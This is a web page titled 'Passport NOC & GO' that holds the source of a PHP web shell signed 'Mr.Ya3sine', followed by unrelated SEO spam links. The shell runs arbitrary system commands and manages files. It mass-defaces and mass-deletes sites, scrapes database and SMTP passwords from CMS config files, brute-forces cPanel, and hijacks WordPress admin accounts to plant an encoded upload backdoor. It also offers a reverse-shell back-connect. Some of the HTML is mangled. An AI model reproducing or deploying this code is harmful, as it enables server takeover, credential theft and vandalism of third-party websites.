Passport NOC & GO

<html></div>
<head></div>
<title>Mr.Ya3sine</title></div>
<meta name='author' content='Mr.Ya3sine'></div>
<meta charset="UTF-8"></div>
<style type='text/css'></div>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html {
    background: #000000;
    color: #ffffff;
    font-family: 'Ubuntu';
font-size: 13px;
width: 100%;
}
li {
display: inline;
margin: 5px;
padding: 5px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Ubuntu';
font-size: 13px;
}
.table_home, .th_home, .td_home {
border: 1px solid #ffffff;
}
th {
padding: 10px;
}
a {
color: #ffffff;
text-decoration: none;
}
a:hover {
color: gold;
text-decoration: underline;
}
b {
color: gold;
}
input[type=text], input[type=password],input[type=submit] {
background: transparent; 
color: #ffffff; 
border: 1px solid #ffffff; 
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
textarea {
border: 1px solid #ffffff;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
}
</style></div>
</head></div>
<?php
###############################################################################
// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
// Tapi Selebihnya, itu hasil kreasi Mr.Ya3sine sendiri.
// Tanpa kalian kita tidak akan BESAR seperti sekarang.
// Greetz: All Member Mr.Ya3sine. & all my friends.
###############################################################################
function w($dir,$perm) {
if(!is_writable($dir)) {
return "".$perm."";
} else {
return "".$perm."";
}
}
function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function hdd($s) {
if($s >= 1073741824)
return sprintf('%1.2f',$s / 1073741824 ).' GB';
elseif($s >= 1048576)
return sprintf('%1.2f',$s / 1048576 ) .' MB';
elseif($s >= 1024)
return sprintf('%1.2f',$s / 1024 ) .' KB';
else
return $s .' B';
}
function ambilKata($param, $kata1, $kata2){
    if(strpos($param, $kata1) === FALSE) return FALSE;
    if(strpos($param, $kata2) === FALSE) return FALSE;
    $start = strpos($param, $kata1) + strlen($kata1);
    $end = strpos($param, $kata2, $start);
    $return = substr($param, $start, $end - $start);
    return $return;
}
if(get_magic_quotes_gpc()) {
function idx_ss($array) {
return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
}
$_POST = idx_ss($_POST);
}
 
error_reporting(0);
error_log(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($_GET['dir']);
} else {
$dir = getcwd();
}
$dir = str_replace("\","/",$dir);
$scdir = explode("/", $dir);
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "ON" : "OFF";
$curl = (function_exists('curl_version')) ? "ON" : "OFF";
$wget = (exe('wget --help')) ? "ON" : "OFF";
$perl = (exe('perl --help')) ? "ON" : "OFF";
$python = (exe('python --help')) ? "ON" : "OFF";
$show_ds = (!empty($ds)) ? "$ds" : "NONE";
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
echo "System: ".php_uname()."
";
echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")
";
echo "Server IP: ".gethostbyname($_SERVER['HTTP_HOST'])." | Your IP: ".$_SERVER['REMOTE_ADDR']."
";
echo "HDD: ".hdd(disk_free_space("/"))." / ".hdd(disk_total_space("/"))."
";
echo "Safe Mode: $sm
";
echo "Disable Functions: $show_ds
";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl
";
echo "Current DIR: ";
foreach($scdir as $c_dir => $cdir) {
echo "
for($i = 0; $i <= $c_dir; $i++) {
echo $scdir[$i];
if($i != $c_dir) {
echo "/";
}
}
}
echo "
";
echo "
";
echo "
    ";
echo "
  • [ Home ]
  • ";
    echo "
  • [ Upload ]
  • ";
    echo "
  • [ Command ]
  • ";
    echo "
  • [ Mass Deface ]
  • ";
    echo "
  • [ Mass Delete ]
  • ";
    echo "
  • [ Config ]
  • ";
    echo "
  • [ Jumping ]
  • ";
    echo "
  • [ CPanel Crack ]
  • ";
    echo "
  • [ SMTP Grabber ]
  • ";
    echo "
  • [ Zone-H ]
  • ";
    echo "
  • [ CGI Telnet ]
  • ";
    echo "
  • [ network ]
  • ";
    echo "
  • [ Adminer ]

  • ";
    echo "
  • [ Fake Root ]
  • ";
    echo "
  • [ Auto Edit User ]
  • ";
    echo "";
    echo "";
    echo "
    ";
    if($_GET['do'] == 'upload') {
    echo "
    ";
    if($_POST['upload']) {
    if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
    $act = "Uploaded! at $dir/".$_FILES['ix_file']['name']."";
    } else {
    $act = "failed to upload file";
    }
    }
    echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
    echo $act;
    echo "";
    } elseif($_GET['do'] == 'cmd') {
    echo "<form method='post'></div>
    ";
    sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
    echo "
    ";
    } elseif($_POST['tipe_sabun'] == 'murah') {
    echo "
    Tipe Sabun:
    <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal


    Hacked by Mr.Ya3sine</textarea><br>
    <input type='submit' name='start' value='Mass Deface' [removed]='margin: 5px auto; padding: 5px'>";
    hapus_massal($_POST['d_dir'], $_POST['d_file']);
    echo "
    ";
    } else {
    echo "
    ";
    echo "<form method='post'></div>


    <input type='submit' name='start' value='Mass Delete' [removed]='width: 215px;'></div>
    </form></div>
    NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
    ";
    }
    } elseif($_GET['do'] == 'cpanel') {
    if($_POST['crack']) {
    $usercp = explode("rn", $_POST['user_cp']);
    $passcp = explode("rn", $_POST['pass_cp']);
    $i = 0;
    foreach($usercp as $ucp) {
    foreach($passcp as $pcp) {
    if(@mysql_connect('localhost', $ucp, $pcp)) {
    if($_SESSION[$ucp] && $_SESSION[$pcp]) {
    } else {
    $_SESSION[$ucp] = "1";
    $_SESSION[$pcp] = "1";
    if($ucp == '' || $pcp == '') {
     
    } else {
    $i++;
    if(function_exists('posix_getpwuid')) {
    $domain_cp = file_get_contents("/etc/named.conf");
    if($domain_cp == '') {
    $dom =  "gabisa ambil nama domain nya";
    } else {
    preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
    foreach($domains_cp[1] as $dj) {
    $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
    $user_cp_url = $user_cp_url['name'];
    if($user_cp_url == $ucp) {
    $dom = "$dj";
    break;
    }
    }
    }
    } else {
    $dom = "function is Disable by system";
    }
    echo "username ($ucp) password ($pcp) domain ($dom)
    ";
    }
    }
    }
    }
    }
    if($i == 0) {
    } else {
    echo "
    sukses nyolong ".$i." Cpanel by Mr.Ya3sine.";
    }
    } else {
    echo "
    <form method='post'></div>
    USER:
    <textarea [removed]='width: 450px; height: 200px;' name='pass_cp'>";
    function cp_pass($dir) {
    $pass = "";
    $dira = scandir($dir);
    foreach($dira as $dirb) {
    if(!is_file("$dir/$dirb")) continue;
    $ambil = file_get_contents("$dir/$dirb");
    if(preg_match("/WordPress/", $ambil)) {
    $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."n";
    } elseif(preg_match("/JConfig|joomla/", $ambil)) {
    $pass .= ambilkata($ambil,"password = '","'")."n";
    } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
    $pass .= ambilkata($ambil,"<![CDATA[","]]>")."n";
    } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
    $pass .= ambilkata($ambil,'password = "','"')."n";
    } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
    $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."n";
    } elseif(preg_match("/client/", $ambil)) {
    preg_match("/password=(.*)/", $ambil, $pass1);
    if(preg_match('/"/', $pass1[1])) {
    $pass1[1] = str_replace('"', "", $pass1[1]);
    $pass .= $pass1[1]."n";
    }
    } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
    $pass .= ambilkata($ambil,"db_password = '","'")."n";
    }
    }
    echo $pass;
    }
    $cp_pass = cp_pass($dir);
    echo $cp_pass;
    echo "</textarea><br>
    <input type='submit' name='crack' [removed]='width: 450px;'><br>
    Deface Page:
    <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' [removed]='width: 450px; height: 150px;' name='user_cp'>";
    $_usercp = fopen("/etc/passwd","r");
    while($getu = fgets($_usercp)) {
    if($getu == '' || !$_usercp) {
    echo "Can't read /etc/passwd";
    } else {
    preg_match_all("/(.*?):x:/", $getu, $u);
    foreach($u[1] as $user_cp) {
    if(is_dir("/home/$user_cp/public_html")) {
    echo "$user_cpn";
    }
    }
    }
    }
    echo "</textarea><br>
    PASS:
    <textarea [removed]='width: 450px;' value='Hajar'></div>
    </form></div>
    NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
    ";
    }
    } elseif($_GET['do'] == 'smtp') {
    echo "
    NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

    ";
    function scj($dir) {
    $dira = scandir($dir);
    foreach($dira as $dirb) {
    if(!is_file("$dir/$dirb")) continue;
    $ambil = file_get_contents("$dir/$dirb");
    $ambil = str_replace("$", "", $ambil);
    if(preg_match("/JConfig|joomla/", $ambil)) {
    $smtp_host = ambilkata($ambil,"smtphost = '","'");
    $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
    $smtp_user = ambilkata($ambil,"smtpuser = '","'");
    $smtp_pass = ambilkata($ambil,"smtppass = '","'");
    $smtp_port = ambilkata($ambil,"smtpport = '","'");
    $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
    echo "SMTP Host: $smtp_host
    ";
    echo "SMTP port: $smtp_port
    ";
    echo "SMTP user: $smtp_user
    ";
    echo "SMTP pass: $smtp_pass
    ";
    echo "SMTP auth: $smtp_auth
    ";
    echo "SMTP secure: $smtp_secure

    ";
    }
    }
    }
    $smpt_hunter = scj($dir);
    echo $smpt_hunter;
    } elseif($_GET['do'] == 'auto_wp') {
    if($_POST['hajar']) {
    $title = htmlspecialchars($_POST['new_title']);
    $pn_title = str_replace(" ", "-", $title);
    if($_POST['cek_edit'] == "Y") {
    $script = $_POST['edit_content'];
    } else {
    $script = $title;
    }
    $conf = $_POST['config_dir'];
    $scan_conf = scandir($conf);
    foreach($scan_conf as $file_conf) {
    if(!is_file("$conf/$file_conf")) continue;
    $config = file_get_contents("$conf/$file_conf");
    if(preg_match("/WordPress/", $config)) {
    $dbhost = ambilkata($config,"DB_HOST', '","'");
    $dbuser = ambilkata($config,"DB_USER', '","'");
    $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
    $dbname = ambilkata($config,"DB_NAME', '","'");
    $dbprefix = ambilkata($config,"table_prefix  = '","'");
    $prefix = $dbprefix."posts";
    $option = $dbprefix."options";
    $conn = mysql_connect($dbhost,$dbuser,$dbpass);
    $db = mysql_select_db($dbname);
    $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
    $result = mysql_fetch_array($q);
    $id = $result[ID];
    $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
    $result2 = mysql_fetch_array($q2);
    $target = $result2[option_value];
    $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
    $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
    echo "
    </textarea><br>
    <input type='submit' name='hajar' value='Hajar!' [removed]='width: 450px; height: 150px;' name='url'></textarea>
    <input type='submit' name='submit' value='Submit' [removed]='width: 450px; height: 250px;' name='url'>";
    reverse($_SERVER['HTTP_HOST']);
    echo "</textarea><br>
    <input type='submit' name='reverse' value='Scan Fake Root!' [removed]='width: 450px;' name='auto_deface_wp' value='Hajar!!'></div>
    </form></div>

    NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
    ";
    }
    } elseif($_GET['do'] == 'auto_dwp2') {
    if($_POST['auto_deface_wp']) {
    function anucurl($sites) {
        $ch = curl_init($sites);
              curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
              curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
              curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
              curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
              curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
              curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
              curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
              curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
              curl_setopt($ch, CURLOPT_COOKIESESSION,true);
    $data = curl_exec($ch);
      curl_close($ch);
    return $data;
    }
    function lohgin($cek, $web, $userr, $pass, $wp_submit) {
        $post = array(
                       "log" => "$userr",
                       "pwd" => "$pass",
                       "rememberme" => "forever",
                       "wp-submit" => "$wp_submit",
                       "redirect_to" => "$web",
                       "testcookie" => "1",
                       );
    $ch = curl_init($cek);
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
      curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
      curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
      curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
      curl_setopt($ch, CURLOPT_POST, 1);
      curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
      curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
      curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
      curl_setopt($ch, CURLOPT_COOKIESESSION, true);
    $data = curl_exec($ch);
      curl_close($ch);
    return $data;
    }
    $link = explode("rn", $_POST['link']);
    $script = htmlspecialchars($_POST['script']);
    $user = "Mr.Ya3sine";
    $pass = "Mr.Ya3sine";
    $passx = md5($pass);
    foreach($link as $dir_config) {
    $config = anucurl($dir_config);
    $dbhost = ambilkata($config,"DB_HOST', '","'");
    $dbuser = ambilkata($config,"DB_USER', '","'");
    $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
    $dbname = ambilkata($config,"DB_NAME', '","'");
    $dbprefix = ambilkata($config,"table_prefix  = '","'");
    $prefix = $dbprefix."users";
    $option = $dbprefix."options";
    $conn = mysql_connect($dbhost,$dbuser,$dbpass);
    $db = mysql_select_db($dbname);
    $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
    $result = mysql_fetch_array($q);
    $id = $result[ID];
    $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
    $result2 = mysql_fetch_array($q2);
    $target = $result2[option_value];
    if($target == '') {
    echo "[-] error, gabisa ambil nama domain nya
    ";
    } else {
    echo "[+] $target
    ";
    }
    $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
    if(!$conn OR !$db OR !$update) {
    echo "[-] MySQL Error: ".mysql_error()."

    ";
    mysql_close($conn);
    } else {
    $site = "$target/wp-login.php";
    $site2 = "$target/wp-admin/theme-install.php?upload";
    $b1 = anucurl($site2);
    $wp_sub = ambilkata($b1, "id="wp-submit" class="button button-primary button-large" value="","" />");
    $b = lohgin($site, $site2, $user, $pass, $wp_sub);
    $anu2 = ambilkata($b,"name="_wpnonce" value="","" />");
    $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
    $www = "m.php";
    $fp5 = fopen($www,"w");
    fputs($fp5,$upload3);
    $post2 = array(
    "_wpnonce" => "$anu2",
    "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
    "themezip" => "@$www",
    "install-theme-submit" => "Install Now",
    );
    $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
      curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
      curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
      curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
      curl_setopt($ch, CURLOPT_POST, 1);
      curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
      curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
      curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
          curl_setopt($ch, CURLOPT_COOKIESESSION, true);
    $data3 = curl_exec($ch);
      curl_close($ch);
    $y = date("Y");
    $m = date("m");
    $namafile = "id.php";
    $fpi = fopen($namafile,"w");
    fputs($fpi,$script);
    $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
       curl_setopt($ch6, CURLOPT_POST, true);
       curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
       curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
       curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
                 curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
               curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
    $postResult = curl_exec($ch6);
       curl_close($ch6);
    $as = "$target/k.php";
    $bs = anucurl($as);
    if(preg_match("#$script#is", $bs)) {
                        echo "[+] berhasil mepes...
    ";
                        echo "[+] $as

    "; 
                        } else {
                        echo "[-] gagal mepes...
    ";
                        echo "[!!] coba aja manual:
    ";
                        echo "[+] $target/wp-login.php
    ";
                        echo "[+] username: $user
    ";
                        echo "[+] password: $pass

    ";     
                        }
                mysql_close($conn);
    }
    }
    } else {
    echo "

    WordPress Auto Deface V.2

    <form method='post'></div>
    Link Config:
    <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' [removed]='width: 450px;' name='auto_deface_wp' value='Hajar!!'></div>
    </form></center>";
    }
    } elseif($_GET['do'] == 'network') {
    echo "
    <form method='post'></div>
    Back Connect:
    <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'><br>
    <input type='text' placeholder='port' name='port_bc' value='6969'><br>
    <input type='submit' name='sub_bc' value='Reverse' [removed]='width: 450px;' height='10'></div>
    <input type='submit' name='new_save_file' value='Submit'></div>
    </form>";
    } elseif($_GET['act'] == 'newfolder') {
    if($_POST['new_save_folder']) {
    $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
    if(!mkdir($new_folder)) {
    $act = "permission denied";
    } else {
    $act = "[removed][removed]='?dir=".$dir."';[removed]";
    }
    }
    echo $act;
    echo "<form method='post'></div>
    Folder Name: <input type='text' name='newfolder' [removed]='width: 450px;' height='10'></div>
    <input type='submit' name='dir_rename' value='rename'></div>
    </form>";
    } elseif($_GET['act'] == 'delete_dir') {
    $delete_dir = rmdir($dir);
    if($delete_dir) {
    $act = "[removed][removed]='?dir=".dirname($dir)."';[removed]";
    } else {
    $act = "could not remove ".basename($dir)."";
    }
    echo $act;
    } elseif($_GET['act'] == 'view') {
    echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
    ";
    echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
    } elseif($_GET['act'] == 'edit') {
    if($_POST['save']) {
    $save = file_put_contents($_GET['file'], $_POST['src']);
    if($save) {
    $act = "Saved!";
    } else {
    $act = "permission denied";
    }
    echo "".$act."
    ";
    }
    echo "Filename: ".basename($_GET['file'])." [ view ] [ edit ] [ rename ] [ download ] [ delete ]
    ";
    echo "<form method='post'></div>
    <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
    <input type='submit' value='Save' name='save' [removed]='width: 450px;' height='10'></div>
    <input type='submit' name='do_rename' value='rename'></div>
    </form>";
    } elseif($_GET['act'] == 'delete') {
    $delete = unlink($_GET['file']);
    if($delete) {
    $act = "[removed][removed]='?dir=".$dir."';[removed]";
    } else {
    $act = "permission denied";
    }
    echo $act;
    } elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
    @ob_clean();
    $file = $_GET['file'];
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
    } else {
    if(is_dir($dir) == true) {
    echo '
    ';
    $scandir = scandir($dir);
    foreach($scandir as $dirx) {
    $dtype = filetype("$dir/$dirx");
    $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
      if(!is_dir("$dir/$dirx")) continue;
      if($dirx === '..') {
      $href = "$dirx";
      } elseif($dirx === '.') {
      $href = "$dirx";
      } else {
      $href = "$dirx";
      }
      if($dirx === '.' || $dirx === '..') {
      $act_dir = "newfile | newfolder";
      } else {
      $act_dir = "rename | delete";
      }
      echo "
    ";
      echo "
    ";
    echo "
    ";
    echo "
    ";
    echo "
    ";
    }
    echo "
    Name
    Type
    Size
    Last Modified
    Permission
    Action
    $>"; <> class='td_home'>
    $dtype
    -
    ";
    echo "
    $dtime
    ".w("$dir/$dirx",perms("$dir/$dirx"))."
    edit | rename | delete | download

    ";
    } else {
    echo "can't open directory";
    }
    echo "
    Copyright © ".date("Y")." - Mr.Ya3sine
    ";
    }
    ?>
    </html></div>
    antalya haber sesli sohbet Antalya temizlik şirketleri Antalya temizlik şirketleri

    antalya rent a car antalya rent a car ko cuce Antalya dış cephe temizliği Antalya inşaat temizliği seslisohbet seslichat